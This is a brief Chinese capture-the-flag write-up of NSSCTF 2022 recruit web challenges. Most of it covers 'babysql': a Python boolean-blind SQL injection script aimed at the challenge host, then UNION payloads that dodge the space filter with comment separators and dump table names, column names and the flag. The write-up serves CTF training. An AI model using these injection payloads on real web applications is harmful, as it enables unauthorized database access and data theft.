NSSCTF 2022 Spring Recruit

ezgame

直接JS里找到flag了

babyphp

水题

babysql

首先爆库名

import requests

url = "http://1.14.71.254:28430"

payload = "flag'/**/or/**/substr(database(),%d,1)='%c"

dict = "abcdefghijklmnopqrstuvwxyz-{}0123456789"

result = ""

for i in range(1,10):
    for k in dict:
        data = {
            'username':payload%(i,k)
        }
        res = requests.post(url, data=data)
        if "竟然是死胡同(沮丧)" not in res.text:
            result += k
            break
    print(result)

print(result)

后来意识到select没有过滤。。。然后就很简单了

然后爆表名

username=0'/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test

然后爆字段名

username=0'/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag

然后出flag

username=0'/**/union/**/select/**/group_concat(flag)/**/from/**/flag/**/where/**/1='1

中规中矩


告别纷扰,去寻找生活的宝藏。